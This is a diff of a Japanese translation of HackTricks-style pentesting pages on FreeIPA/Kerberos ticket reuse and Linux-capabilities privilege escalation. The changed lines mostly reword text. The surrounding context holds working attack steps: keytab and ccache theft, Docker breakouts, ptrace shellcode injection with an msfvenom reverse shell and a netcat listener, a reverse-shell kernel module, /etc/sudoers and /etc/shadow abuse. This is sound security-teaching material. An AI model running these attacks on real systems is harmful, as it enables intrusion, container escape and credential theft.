-FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory**のオープンソース**代替**です。Active Directoryに類似した管理のために、完全な**LDAPディレクトリ**とMIT **Kerberos**キー配布センターを組み合わせています。CAおよびRA証明書管理のためにDogtag **Certificate System**を利用し、スマートカードを含む**多要素**認証をサポートしています。Unix認証プロセスのためにSSSDが統合されています。詳細については、以下を参照してください: +FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory**のオープンソース**代替**です。Active Directoryに類似した管理のために、完全な**LDAPディレクトリ**とMIT **Kerberos**キー配布センターを組み合わせています。CAおよびRA証明書管理のためにDogtag **Certificate System**を利用し、スマートカードを含む**多要素**認証をサポートしています。Unix認証プロセスのためにSSSDが統合されています。詳細については次をご覧ください: {{#ref}} ../freeipa-pentesting.md @@ -30,7 +30,7 @@ FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory** ### パス・ザ・チケット -このページでは、**Linuxホスト内でKerberosチケットを見つけることができるさまざまな場所**を見つけることができます。次のページでは、これらのCCacheチケット形式をKirbi(Windowsで使用する必要がある形式)に変換する方法と、PTT攻撃を実行する方法を学ぶことができます: +このページでは、**Linuxホスト内でKerberosチケットを見つけることができるさまざまな場所**を見つけることができます。次のページでは、このCCacheチケット形式をKirbi(Windowsで使用する必要がある形式)に変換する方法と、PTT攻撃を実行する方法を学ぶことができます: {{#ref}} ../../windows-hardening/active-directory-methodology/pass-the-ticket.md @@ -38,7 +38,7 @@ FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory** ### /tmpからのCCACHEチケット再利用 -CCACHEファイルは**Kerberos資格情報**を保存するためのバイナリ形式で、通常は`/tmp`に600の権限で保存されます。これらのファイルは、ユーザーのUIDに相当する**名前形式`krb5cc_%{uid}`**で識別できます。認証チケットの検証には、**環境変数`KRB5CCNAME`**を希望するチケットファイルのパスに設定する必要があり、再利用を可能にします。 +CCACHEファイルは**Kerberos資格情報**を保存するためのバイナリ形式で、通常は`/tmp`に600の権限で保存されます。これらのファイルは、ユーザーのUIDに関連する**名前形式`krb5cc_%{uid}`**で識別できます。認証チケットの検証には、**環境変数`KRB5CCNAME`**を希望するチケットファイルのパスに設定する必要があり、再利用を可能にします。 `env | grep KRB5CCNAME`を使用して、認証に使用されている現在のチケットをリストします。形式はポータブルで、環境変数を設定することでチケットを**再利用できます**。`export KRB5CCNAME=/tmp/ticket.ccache`を使用します。Kerberosチケットの名前形式は`krb5cc_%{uid}`で、uidはユーザーのUIDです。 ```bash @@ -60,7 +60,7 @@ cd tickey/tickey make CONF=Release /tmp/tickey -i ``` -この手順は、さまざまなセッションに注入を試み、成功を示すために抽出されたチケットを `/tmp` に `__krb_UID.ccache` という命名規則で保存します。 +この手順は、さまざまなセッションに注入を試み、抽出されたチケットを `/tmp` に `__krb_UID.ccache` という命名規則で保存することで成功を示します。 ### SSSD KCMからのCCACHEチケットの再利用 @@ -73,7 +73,7 @@ python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey ``` **資格情報キャッシュKerberosブロブは、Mimikatz/Rubeusに渡すことができる使用可能なKerberos CCache**ファイルに変換できます。 -### keytabからのCCACHEチケット再利用 +### キータブからのCCACHEチケット再利用 ```bash git clone https://github.com/its-a-feature/KeytabParser python KeytabParser.py /etc/krb5.keytab @@ -81,7 +81,7 @@ klist -k /etc/krb5.keytab ``` ### /etc/krb5.keytab からアカウントを抽出する -サービスアカウントキーは、ルート権限で動作するサービスにとって不可欠であり、**`/etc/krb5.keytab`** ファイルに安全に保存されています。これらのキーは、サービスのパスワードに似ており、厳格な機密性が求められます。 +サービスアカウントキーは、root権限で動作するサービスにとって不可欠であり、**`/etc/krb5.keytab`** ファイルに安全に保存されています。これらのキーは、サービスのパスワードに似ており、厳格な機密性が求められます。 keytabファイルの内容を確認するには、**`klist`** を使用できます。このツールは、特にキータイプが23として識別される場合に、ユーザー認証のための**NT Hash**を含むキーの詳細を表示するように設計されています。 ```bash diff --git a/src/linux-hardening/privilege-escalation/linux-capabilities.md b/src/linux-hardening/privilege-escalation/linux-capabilities.md index 6ae01582e..aeb7fcec0 100644 --- a/src/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/src/linux-hardening/privilege-escalation/linux-capabilities.md @@ -15,8 +15,8 @@ Linux capabilitiesは**root権限をより小さく、明確な単位に分割** 1. **Inherited (CapInh)**: - **目的**: 親プロセスから引き継がれる権限を決定します。 -- **機能**: 新しいプロセスが作成されると、このセットから親の権限を引き継ぎます。プロセスの生成を通じて特定の権限を維持するのに役立ちます。 -- **制限**: プロセスは親が持っていなかった権限を得ることはできません。 +- **機能**: 新しいプロセスが作成されると、このセットから親の権限を引き継ぎます。プロセスの生成間で特定の権限を維持するのに役立ちます。 +- **制限**: プロセスは、親が持っていなかった権限を得ることはできません。 2. **Effective (CapEff)**: @@ -26,14 +26,14 @@ Linux capabilitiesは**root権限をより小さく、明確な単位に分割** 3. **Permitted (CapPrm)**: -- **目的**: プロセスが持つことができる最大の権限セットを定義します。 -- **機能**: プロセスは許可されたセットから有効なセットに権限を昇格させ、その権限を使用できるようにします。また、許可されたセットから権限を削除することもできます。 +- **目的**: プロセスが持つことができる最大の権限のセットを定義します。 +- **機能**: プロセスは、許可されたセットから有効なセットに権限を昇格させ、その権限を使用できるようにします。また、許可されたセットから権限を削除することもできます。 - **境界**: プロセスが持つことができる権限の上限として機能し、プロセスが事前に定義された権限の範囲を超えないようにします。 4. **Bounding (CapBnd)**: - **目的**: プロセスがライフサイクルの間に取得できる権限に上限を設けます。 -- **機能**: プロセスが引き継ぎ可能または許可されたセットに特定の権限を持っていても、バウンディングセットにも含まれていない限り、その権限を取得することはできません。 +- **機能**: プロセスが引き継ぎ可能または許可されたセットに特定の権限を持っていても、その権限がバウンディングセットにも含まれていない限り、その権限を取得することはできません。 - **使用例**: このセットは、プロセスの権限昇格の可能性を制限するのに特に役立ち、追加のセキュリティ層を提供します。 5. **Ambient (CapAmb)**: @@ -49,7 +49,7 @@ process.add_capability_to_set('CapPrm', 'new_capability') process.limit_capabilities('CapBnd') process.preserve_capabilities_across_execve('CapAmb') ``` -さらに情報については、以下を確認してください: +さらに情報については、次を確認してください: - [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work) - [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/) @@ -100,7 +100,7 @@ CapAmb: 0000000000000000 capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` -実行中のプロセスの能力を確認するには、**getpcaps**ツールをそのプロセスID(PID)の後に続けて使用するだけです。プロセスIDのリストを提供することもできます。 +実行中のプロセスの能力を確認するには、**getpcaps**ツールを使用し、その後にプロセスID(PID)を続けて入力します。また、プロセスIDのリストを提供することもできます。 ```bash getpcaps 1234 ``` @@ -132,7 +132,7 @@ _getpcaps_ツールは、特定のスレッドの利用可能な能力を照会 getcap /usr/bin/ping /usr/bin/ping = cap_net_raw+ep ``` -バイナリの**能力を持つものを検索する**には、次のようにします: +バイナリを**能力で検索**するには、次のコマンドを使用します: ```bash getcap -r / 2>/dev/null ``` @@ -148,16 +148,16 @@ _capsh_自体の出力に加えて、_tcpdump_コマンド自体もエラーを このエラーは、pingコマンドがICMPソケットを開くことが許可されていないことを明確に示しています。これで、これが期待通りに機能することが確実になりました。 -### 機能の削除 +### 能力の削除 -バイナリの機能を削除することができます。 +バイナリの能力を削除するには、 ```bash setcap -r ``` ## ユーザーの能力 -明らかに**能力をユーザーにも割り当てることが可能です**。これはおそらく、ユーザーによって実行されるすべてのプロセスがそのユーザーの能力を使用できることを意味します。\ -[これ](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7)、[これ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)、および[これ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)に基づいて、ユーザーに特定の能力を与えるためにいくつかのファイルを新たに設定する必要がありますが、各ユーザーに能力を割り当てるファイルは`/etc/security/capability.conf`です。\ +明らかに**ユーザーにも能力を割り当てることが可能です**。これはおそらく、ユーザーによって実行されるすべてのプロセスがそのユーザーの能力を使用できることを意味します。\ +[これ](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7)、[これ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)、および[これ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)に基づいて、ユーザーに特定の能力を与えるためにいくつかのファイルを新たに構成する必要がありますが、各ユーザーに能力を割り当てるファイルは`/etc/security/capability.conf`です。\ ファイルの例: ```bash # Simple @@ -270,17 +270,17 @@ gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient ./ambient /bin/bash ``` -コンパイルされた環境バイナリによって実行された**bash**内では、**新しい能力**を観察することが可能です(通常のユーザーは「現在」セクションに能力を持っていません)。 +コンパイルされた環境バイナリによって実行された**bash**内では、**新しい能力**を観察することができます(通常のユーザーは「現在」のセクションに能力を持っていません)。 ```bash capsh --print Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip ``` > [!CAUTION] -> あなたは**許可されたセットと継承可能なセットの両方に存在する**能力のみを追加できます。 +> あなたは**許可されたセット**と**継承可能なセット**の両方に存在する能力のみを追加できます。 ### 能力対応/能力無視バイナリ -**能力対応バイナリは、環境によって与えられた新しい能力を使用しません**が、**能力無視バイナリはそれらを使用します**。これは、能力無視バイナリがそれらを拒否しないためです。これにより、特定の環境内でバイナリに能力を付与することができるため、能力無視バイナリは脆弱になります。 +**能力対応バイナリは、環境によって与えられた新しい能力を使用しません**が、**能力無視バイナリはそれらを使用します**。これは、能力無視バイナリがそれらを拒否しないためです。これにより、特定の環境内でバイナリに能力を付与することができるため、能力無視バイナリが脆弱になります。 ## サービスの能力 @@ -329,7 +329,7 @@ getcap -r / 2>/dev/null ``` ### Exploitation example -次の例では、バイナリ `/usr/bin/python2.6` が特権昇格に対して脆弱であることが判明しています: +次の例では、バイナリ `/usr/bin/python2.6` が特権昇格に対して脆弱であることがわかります: ```bash setcap cap_setuid+ep /usr/bin/python2.7 /usr/bin/python2.7 = cap_setuid+ep @@ -351,18 +351,18 @@ getcap /usr/sbin/tcpdump 2. `SUID`/`SGID`ビットが設定されていない 3. 空の能力セットが設定されている(例:`getcap myelf`が`myelf =ep`を返す) -そのバイナリは**rootとして実行されます**。 +その**バイナリはrootとして実行されます**。 ## CAP_SYS_ADMIN -**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)**は非常に強力なLinuxの能力であり、その広範な**管理特権**のためにほぼrootレベルに等しいと見なされます。デバイスのマウントやカーネル機能の操作などが含まれます。全システムをシミュレートするコンテナには不可欠ですが、**`CAP_SYS_ADMIN`は特権昇格やシステムの妥協の可能性があるため、特にコンテナ化された環境では重大なセキュリティ上の課題を引き起こします**。したがって、その使用は厳格なセキュリティ評価と慎重な管理を必要とし、**最小特権の原則**に従って攻撃面を最小限に抑えるために、アプリケーション固有のコンテナではこの能力を削除することが強く推奨されます。 +**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)**は非常に強力なLinuxの能力であり、その広範な**管理特権**のためにほぼrootレベルに等しいと見なされます。デバイスのマウントやカーネル機能の操作などに使用されます。全システムをシミュレートするコンテナには不可欠ですが、**`CAP_SYS_ADMIN`は特権昇格やシステムの妥協の可能性があるため、特にコンテナ化された環境では重大なセキュリティ上の課題を引き起こします**。したがって、その使用は厳格なセキュリティ評価と慎重な管理を必要とし、**最小特権の原則**に従って攻撃面を最小限に抑えるために、アプリケーション固有のコンテナではこの能力を削除することが強く推奨されます。 **バイナリの例** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_admin+ep ``` -Pythonを使用すると、実際の_passwd_ファイルの上に修正された_passwd_ファイルをマウントできます: +Pythonを使用して、実際の _passwd_ ファイルの上に修正された _passwd_ ファイルをマウントできます: ```bash cp /etc/passwd ./ #Create a copy of the passwd file openssl passwd -1 -salt abc password #Get hash of "password" @@ -398,7 +398,7 @@ uid=0(root) gid=0(root) groups=0(root) ``` -以前の出力の中で、SYS_ADMIN権限が有効になっていることがわかります。 +以前の出力の中で、SYS_ADMIN権限が有効になっているのがわかります。 - **マウント** @@ -416,8 +416,8 @@ chroot ./ bash #You have a shell inside the docker hosts disk ``` - **フルアクセス** -前の方法では、docker ホストのディスクにアクセスすることができました。\ -ホストが **ssh** サーバーを実行している場合、**docker ホスト** ディスク内にユーザーを作成し、SSH 経由でアクセスすることができます: +前の方法では、dockerホストのディスクにアクセスすることができました。\ +ホストが**ssh**サーバーを実行している場合、**dockerホスト**ディスク内にユーザーを作成し、SSH経由でアクセスすることができます: ```bash #Like in the example before, the first step is to mount the docker host disk fdisk -l @@ -433,9 +433,9 @@ ssh john@172.17.0.1 -p 2222 ``` ## CAP_SYS_PTRACE -**これは、ホスト内で実行されているプロセスにシェルコードを注入することでコンテナを脱出できることを意味します。** ホスト内で実行されているプロセスにアクセスするには、コンテナを少なくとも **`--pid=host`** で実行する必要があります。 +**これは、ホスト内で実行されているプロセス内にシェルコードを注入することでコンテナを脱出できることを意味します。** ホスト内で実行されているプロセスにアクセスするには、コンテナは少なくとも **`--pid=host`** で実行する必要があります。 -**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** は、`ptrace(2)` によって提供されるデバッグおよびシステムコールトレース機能を使用する能力を付与し、`process_vm_readv(2)` や `process_vm_writev(2)` のようなクロスメモリアタッチ呼び出しを可能にします。診断および監視目的には強力ですが、`CAP_SYS_PTRACE` が `ptrace(2)` に対するセキュリティ制限策(seccompフィルターなど)なしで有効になっている場合、システムのセキュリティを著しく損なう可能性があります。特に、他のセキュリティ制限、特にseccompによって課せられた制限を回避するために悪用される可能性があり、[このような概念実証(PoC)によって示されています](https://gist.github.com/thejh/8346f47e359adecd1d53)。 +**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** は、`ptrace(2)` によって提供されるデバッグおよびシステムコールトレース機能を使用する能力を付与し、`process_vm_readv(2)` や `process_vm_writev(2)` のようなクロスメモリアタッチ呼び出しを可能にします。診断および監視目的には強力ですが、`CAP_SYS_PTRACE` が `ptrace(2)` に対するセキュリティ制限策(例えば seccomp フィルタ)なしで有効になっている場合、システムセキュリティを著しく損なう可能性があります。特に、他のセキュリティ制限、特に seccomp によって課せられた制限を回避するために悪用される可能性があります。これは、[このような概念実証(PoC)](https://gist.github.com/thejh/8346f47e359adecd1d53)によって示されています。 **バイナリを使用した例(python)** ```bash @@ -529,13 +529,13 @@ print("Final Instruction Pointer: " + hex(registers.rip)) # Detach from the process. libc.ptrace(PTRACE_DETACH, pid, None, None) ``` -**バイナリの例 (gdb)** +**バイナリを使った例 (gdb)** `gdb` と `ptrace` 権限: ``` /usr/bin/gdb = cap_sys_ptrace+ep ``` -msfvenomを使用して、gdbを介してメモリに注入するシェルコードを作成します。以下のコマンドを使用します。 +msfvenomを使用して、gdbを介してメモリに注入するシェルコードを作成します。以下のコマンドを使用して、シェルコードを生成できます。 ```bash msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f c @@ -588,9 +588,9 @@ Continuing. process 207009 is executing new program: /usr/bin/dash [...] ``` -**環境を使った例 (Dockerブレイクアウト) - 別のgdbの悪用** +**環境の例 (Dockerブレイクアウト) - 別のgdbの悪用** -もし**GDB**がインストールされている場合(または`apk add gdb`や`apt install gdb`でインストールできます)、**ホストからプロセスをデバッグ**し、`system`関数を呼び出すことができます。(この技術は`SYS_ADMIN`の権限も必要です)**。** +**GDB** がインストールされている場合(または `apk add gdb` や `apt install gdb` でインストールできます)、**ホストからプロセスをデバッグ**し、`system` 関数を呼び出すことができます。(この技術は `SYS_ADMIN` 権限も必要です)**。** ```bash gdb -p 1234 (gdb) call (void)system("ls") @@ -622,12 +622,12 @@ groups=0(root 1. **アーキテクチャ** を取得 `uname -m` 2. アーキテクチャ用の **シェルコード** を見つける ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) 3. プロセスメモリに **シェルコード** を **注入** するための **プログラム** を見つける ([https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c](https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c)) -4. プログラム内の **シェルコード** を **修正** し、**コンパイル** する `gcc inject.c -o inject` -5. **注入** して **シェル** を取得する: `./inject 299; nc 172.17.0.1 5600` +4. プログラム内の **シェルコード** を **修正** し、 **コンパイル** する `gcc inject.c -o inject` +5. **注入** し、 **シェル** を取得する: `./inject 299; nc 172.17.0.1 5600` ## CAP_SYS_MODULE -**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** は、プロセスが **カーネルモジュールをロードおよびアンロードすることを可能にします (`init_module(2)`, `finit_module(2)` および `delete_module(2)` システムコール)**。これにより、カーネルのコア操作に直接アクセスできます。この機能は重大なセキュリティリスクをもたらし、特権昇格やシステム全体の危険にさらされる可能性があります。カーネルを変更することを可能にし、Linuxのセキュリティメカニズム、Linux Security Modulesやコンテナの隔離を回避します。 +**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** は、プロセスに **カーネルモジュールをロードおよびアンロードする権限を与えます(`init_module(2)`、`finit_module(2)`、および `delete_module(2)` システムコール)**。これにより、カーネルのコア操作に直接アクセスできます。この機能は重大なセキュリティリスクをもたらし、特権昇格やシステム全体の危険にさらされる可能性があります。カーネルを変更することを可能にし、Linuxのセキュリティメカニズムやコンテナの隔離をすべて回避します。 **これは、ホストマシンのカーネルにカーネルモジュールを挿入/削除できることを意味します。** **バイナリの例** @@ -637,13 +637,13 @@ groups=0(root getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_module+ep ``` -デフォルトでは、**`modprobe`** コマンドは **`/lib/modules/$(uname -r)`** ディレクトリ内の依存関係リストとマップファイルをチェックします。\ -これを悪用するために、偽の **lib/modules** フォルダーを作成しましょう: +デフォルトでは、**`modprobe`** コマンドはディレクトリ **`/lib/modules/$(uname -r)`** 内の依存関係リストとマップファイルをチェックします。\ +これを悪用するために、フェイクの **lib/modules** フォルダーを作成しましょう: ```bash mkdir lib/modules -p cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) ``` -次に、**カーネルモジュールをコンパイルし、以下に2つの例を見つけて、このフォルダーにコピーしてください。** +次に、**カーネルモジュールをコンパイルし、以下に2つの例を見つけて、このフォルダーにコピーしてください**: ```bash cp reverse-shell.ko lib/modules/$(uname -r)/ ``` @@ -661,9 +661,9 @@ km.modprobe("reverse-shell") getcap -r / 2>/dev/null /bin/kmod = cap_sys_module+ep ``` -これは、**`insmod`** コマンドを使用してカーネルモジュールを挿入できることを意味します。この特権を悪用して **reverse shell** を取得するために、以下の例に従ってください。 +**`insmod`** コマンドを使用してカーネルモジュールを挿入することが可能であることを意味します。この特権を悪用して **reverse shell** を取得するために、以下の例に従ってください。 -**環境の例 (Docker ブレイクアウト)** +**環境の例 (Docker breakout)** Docker コンテナ内で有効な能力を確認するには、次のコマンドを使用します: ```bash @@ -718,8 +718,8 @@ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean > Makefile内の各make単語の前の空白文字は**スペースではなくタブ**でなければなりません! `make`を実行してコンパイルします。 -``` -ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. +```bash +Make[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. sudo apt update sudo apt full-upgrade @@ -738,7 +738,7 @@ insmod reverse-shell.ko #Launch the reverse shell ## CAP_DAC_READ_SEARCH -[**CAP_DAC_READ_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) は、プロセスが**ファイルの読み取りおよびディレクトリの読み取りと実行のための権限をバイパスする**ことを可能にします。その主な用途はファイル検索または読み取りの目的です。しかし、これによりプロセスは `open_by_handle_at(2)` 関数を使用でき、プロセスのマウントネームスペースの外にあるファイルを含む任意のファイルにアクセスできます。`open_by_handle_at(2)` で使用されるハンドルは、`name_to_handle_at(2)` を通じて取得された非透明な識別子であるべきですが、改ざんに脆弱なinode番号などの機密情報を含む可能性があります。この能力の悪用の可能性、特にDockerコンテナの文脈においては、Sebastian Krahmerによってショッカーエクスプロイトで示されました。詳細は[こちら](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3)で分析されています。 +[**CAP_DAC_READ_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) は、プロセスが**ファイルの読み取りおよびディレクトリの読み取りと実行のための権限をバイパスする**ことを可能にします。その主な用途はファイル検索または読み取りの目的です。しかし、これによりプロセスは `open_by_handle_at(2)` 関数を使用でき、プロセスのマウントネームスペースの外にあるファイルを含む任意のファイルにアクセスできます。`open_by_handle_at(2)` で使用されるハンドルは、`name_to_handle_at(2)` を通じて取得された非透明な識別子であるべきですが、改ざんに脆弱なinode番号のような機密情報を含む可能性があります。この能力の悪用の可能性は、特にDockerコンテナの文脈において、Sebastian Krahmerによってショッカーエクスプロイトで示されました。詳細は[こちら](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3)で分析されています。 **これは、ファイルの読み取り権限チェックとディレクトリの読み取り/実行権限チェックをバイパスできることを意味します。** **バイナリの例** @@ -759,7 +759,7 @@ for r, d, f in os.walk('/root'): for filename in f: print(filename) ``` -ファイルを読むためには、次のようにできます: +ファイルを読むためには、次のようにできます: ```python print(open("/etc/shadow", "r").read()) ``` @@ -778,11 +778,11 @@ uid=0(root) gid=0(root) groups=0(root) ``` -前の出力の中で、**DAC_READ_SEARCH** 権限が有効になっていることがわかります。その結果、コンテナは **プロセスのデバッグ** が可能です。 +前の出力では、**DAC_READ_SEARCH**権限が有効になっていることがわかります。その結果、コンテナは**プロセスのデバッグ**が可能です。 -次のエクスプロイトの仕組みについては [https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) で学ぶことができますが、要約すると **CAP_DAC_READ_SEARCH** は、許可チェックなしでファイルシステムを横断することを可能にするだけでなく、_**open_by_handle_at(2)**_ に対するチェックを明示的に削除し、**他のプロセスによって開かれた機密ファイルに対して私たちのプロセスがアクセスできる可能性がある** ということです。 +次のエクスプロイトの仕組みについては[https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3)で学ぶことができますが、要約すると**CAP_DAC_READ_SEARCH**は、許可チェックなしでファイルシステムを横断することを可能にするだけでなく、_**open_by_handle_at(2)**_へのチェックを明示的に削除し、**他のプロセスによって開かれた機密ファイルに私たちのプロセスがアクセスできる可能性がある**ということです。 -この権限を悪用してホストからファイルを読み取る元のエクスプロイトはここにあります: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c)。以下は、**読み取りたいファイルを最初の引数として指定し、それをファイルにダンプすることを可能にする修正バージョンです。** +この権限を悪用してホストからファイルを読み取る元のエクスプロイトはここにあります: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c)。以下は、読み取りたいファイルを最初の引数として指定し、それをファイルにダンプすることを可能にする**修正バージョン**です。 ```c #include #include @@ -956,15 +956,15 @@ vim /etc/sudoers #To overwrite it ``` **Example with binary 2** -In this example **`python`** バイナリはこの能力を持ちます。あなたはpythonを使って任意のファイルを上書きすることができます: +この例では、**`python`** バイナリはこの能力を持ちます。あなたは python を使用して任意のファイルを上書きすることができます: ```python file=open("/etc/sudoers","a") file.write("yourusername ALL=(ALL) NOPASSWD:ALL") file.close() ``` -**環境 + CAP_DAC_READ_SEARCH (Docker ブレイクアウト) の例** +**環境 + CAP_DAC_READ_SEARCH (Dockerブレイクアウト)の例** -Docker コンテナ内で有効な能力を確認するには、次のコマンドを使用します: +Dockerコンテナ内で有効な能力を確認するには、次のコマンドを使用します: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep @@ -977,7 +977,7 @@ uid=0(root) gid=0(root) groups=0(root) ``` -まず最初に、ホストの[**DAC_READ_SEARCH能力を悪用して任意のファイルを読み取る**](linux-capabilities.md#cap_dac_read_search)という前のセクションを読んで、**エクスプロイトをコンパイル**してください。\ +まず最初に、ホストの[**DAC_READ_SEARCH能力を悪用して任意のファイルを読み取る**](linux-capabilities.md#cap_dac_read_search)という前のセクションを読み、**エクスプロイトをコンパイル**してください。\ 次に、ホストのファイルシステム内に**任意のファイルを書き込む**ことを可能にする**次のバージョンのショッカーエクスプロイトをコンパイル**してください: ```c #include @@ -1183,17 +1183,17 @@ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null #Find every file readable by a group in /etc with a maxpath of 1 find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null ``` -ファイルを見つけて(読み取りまたは書き込みを通じて)特権を昇格させることができる場合、次のコマンドを使用して**興味深いグループを偽装したシェルを取得**できます: +ファイルを見つけて(読み取りまたは書き込みを通じて)特権を昇格させることができる場合、次のコマンドを使用して**興味のあるグループを偽装したシェルを取得**できます: ```python import os os.setgid(42) os.system("/bin/bash") ``` -この場合、グループshadowが偽装されたため、ファイル`/etc/shadow`を読むことができます: +この場合、グループshadowがなりすましされているため、ファイル`/etc/shadow`を読むことができます: ```bash cat /etc/shadow ``` -もし**docker**がインストールされている場合、**dockerグループ**を**なりすまし**、それを利用して[**dockerソケット**と特権を昇格させる](#writable-docker-socket)ことができます。 +もし**docker**がインストールされている場合、**docker group**を**なりすます**ことができ、[**docker socket**と特権を昇格させる](#writable-docker-socket)ためにそれを悪用することができます。 ## CAP_SETFCAP @@ -1201,7 +1201,7 @@ cat /etc/shadow **バイナリの例** -もしpythonがこの**能力**を持っている場合、特権をrootに昇格させるために非常に簡単にそれを悪用できます: +もしpythonがこの**能力**を持っている場合、特権をrootに昇格させるためにそれを非常に簡単に悪用することができます: ```python:setcapability.py import ctypes, sys @@ -1231,11 +1231,11 @@ python setcapability.py /usr/bin/python2.7 > [!WARNING] > 新しい能力をバイナリにCAP_SETFCAPで設定すると、この能力を失うことに注意してください。 -[SETUID capability](linux-capabilities.md#cap_setuid)を持っていると、特権を昇格させる方法を見るためにそのセクションに移動できます。 +[SETUID capability](linux-capabilities.md#cap_setuid)を取得すると、そのセクションに移動して特権を昇格させる方法を確認できます。 **環境の例(Dockerブレイクアウト)** -デフォルトでは、能力**CAP_SETFCAPはDocker内のコンテナ内のプロセスに与えられます**。これを確認するには、次のようなことを行うことができます: +デフォルトでは、能力**CAP_SETFCAPはDocker内のプロセスに与えられます**。これを確認するには、次のようなことを行います: ```bash cat /proc/`pidof bash`/status | grep Cap CapInh: 00000000a80425fb @@ -1248,7 +1248,7 @@ capsh --decode=00000000a80425fb 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap ``` この能力は**バイナリに他の任意の能力を与える**ことを可能にするため、私たちはこのページで言及されている**他の能力のブレイクアウトを悪用して**コンテナから**脱出**することを考えることができます。\ -しかし、例えばgdbバイナリにCAP_SYS_ADMINとCAP_SYS_PTRACEの能力を与えようとすると、それらを与えることはできますが、**バイナリはその後実行できなくなります**: +しかし、例えばgdbバイナリにCAP_SYS_ADMINとCAP_SYS_PTRACEの能力を与えようとすると、それらを与えることはできますが、**この後バイナリは実行できなくなります**: ```bash getcap /usr/bin/gdb /usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip @@ -1258,17 +1258,17 @@ setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb /usr/bin/gdb bash: /usr/bin/gdb: Operation not permitted ``` -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: これはスレッドが仮定できる有効な能力の**制限されたスーパーセット**です。また、**CAP_SETPCAP**能力を有効なセットに持たないスレッドによって継承可能なセットに追加できる能力の制限されたスーパーセットでもあります。_\ -Permitted capabilitiesは使用できる能力を制限しているようです。\ -しかし、Dockerはデフォルトで**CAP_SETPCAP**も付与するため、**継承可能な能力の中に新しい能力を設定できるかもしれません**。\ +[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: これはスレッドが仮定できる**有効な能力の制限されたスーパーセット**です。また、**CAP_SETPCAP**能力を有効なセットに持たないスレッドによって継承可能なセットに追加できる能力の制限されたスーパーセットでもあります。_\ +Permitted capabilitiesは使用できるものを制限しているようです。\ +しかし、Dockerはデフォルトで**CAP_SETPCAP**も付与するため、**継承可能なものの中に新しい能力を設定できるかもしれません**。\ しかし、この能力のドキュメントには次のように記載されています: _CAP_SETPCAP : \[…] **呼び出しスレッドのバウンディング**セットからその継承可能なセットに任意の能力を追加します。_\ -つまり、**新しい能力をCAP_SYS_ADMINやCAP_SYS_PTRACEのように継承セットに追加することはできず、特権を昇格させることはできません**。 +つまり、**CAP_SYS_ADMINやCAP_SYS_PTRACEのような新しい能力を継承セットに追加することはできない**ということです。 ## 